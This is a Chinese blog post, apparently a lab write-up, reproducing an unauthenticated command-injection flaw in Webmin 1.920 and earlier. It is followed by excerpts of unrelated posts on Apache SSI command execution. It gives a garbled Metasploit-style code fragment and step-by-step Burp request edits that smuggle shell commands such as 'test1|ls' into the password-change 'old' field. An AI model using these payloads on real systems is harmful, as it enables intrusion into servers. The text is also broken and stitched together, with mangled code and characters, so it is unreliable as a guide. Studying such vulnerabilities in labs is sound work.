Webmin 遠端命令執行漏洞

2021-10-02 05:55:09 字數 1367 閱讀 6938

webmin是乙個用於管理類unix系統的管理配置工具,具有web頁面。在其找回密碼頁面中,存在一處無需許可權的命令注入漏洞,通過這個漏洞攻擊者即可以執行任意系統命令。

影響版本

webmin  <= 1.920

漏洞**

def peer

"##:#"

end# target and input verification

##def check

# check passwd change privres = send_ request_ cgi(

/session_ login.cgi"

},' cookie' =>" redirect=1; testing=1; sid=x; sessiontest=1"

})if res & res.code == 200 && res.body =n /failed/

res = send_ request_ cgi(

/session_ login.cgi"

},'data' => "user=root&pam=&expired=2&old=akkus%7 cdir%20&new1=akkuss&new2=akkuss"

})

審計完**後,我們知道:

1.res = send_ request_ cgi()裡面的東西就是資料報的內容,把抓取的資料報新增或修改對應得內容就可以了。

2.資料報user引數有乙個預設使用者root,只有引數user!=root的時候才會進入到修改/etc/shadow的地方,觸發命令注入漏洞。

進入靶機:

無賬號無密碼登陸,用burp抓包

第一步,修改路徑 session_ login.cgi 為 password_ change.cgi

第二步,修改cookie為 cookie: redirect=1; testing=1;sid=x; sessiontest=1

第三步,修改引數 user=jammny&pam=&expired=2&old=test1|ls&new1=test2&new2=test2

以前看到後台直接測試弱口令,現在知道了不只是弱口令,還有其他辦法可以繞過登陸驗證。多觀察多學習多積累,加油。

Apache SSI 遠端命令執行漏洞

漏洞分析 漏洞復現之前,要知道ssi是什麼,那麼ssi是什麼呢?ssi 即server side includes ssi提供了一種對現有html文件增加動態內容的方法,不需要編寫複雜的jsp php asp等程式或者呼叫cgi程式。因為是docker拉取的環境,可能和自己搭建的環境有出入,本人找的...

Apache SSI 遠端命令執行漏洞

在測試任意檔案上傳漏洞的時候,目標服務端可能不允許上傳php字尾的檔案。如果目標伺服器開啟了ssi與cgi支援,我們可以上傳乙個shtml檔案,並利用語法執行任意命令。參考 路徑 vulhub httpd ssi rce 啟動乙個支援ssi與cgi的apache伺服器 docker compose ...

Apache SSI 遠端命令執行漏洞

好好學習,天天向上 在測試任意檔案上傳漏洞的時候,目標服務端可能不允許上傳php字尾的檔案。如果目標伺服器開啟了ssi與cgi支援,我們可以上傳乙個shtml檔案,並利用 語法執行任意命令。這裡使用2.4.38版本 使用vulhub 使用docker啟動 docker compose build d...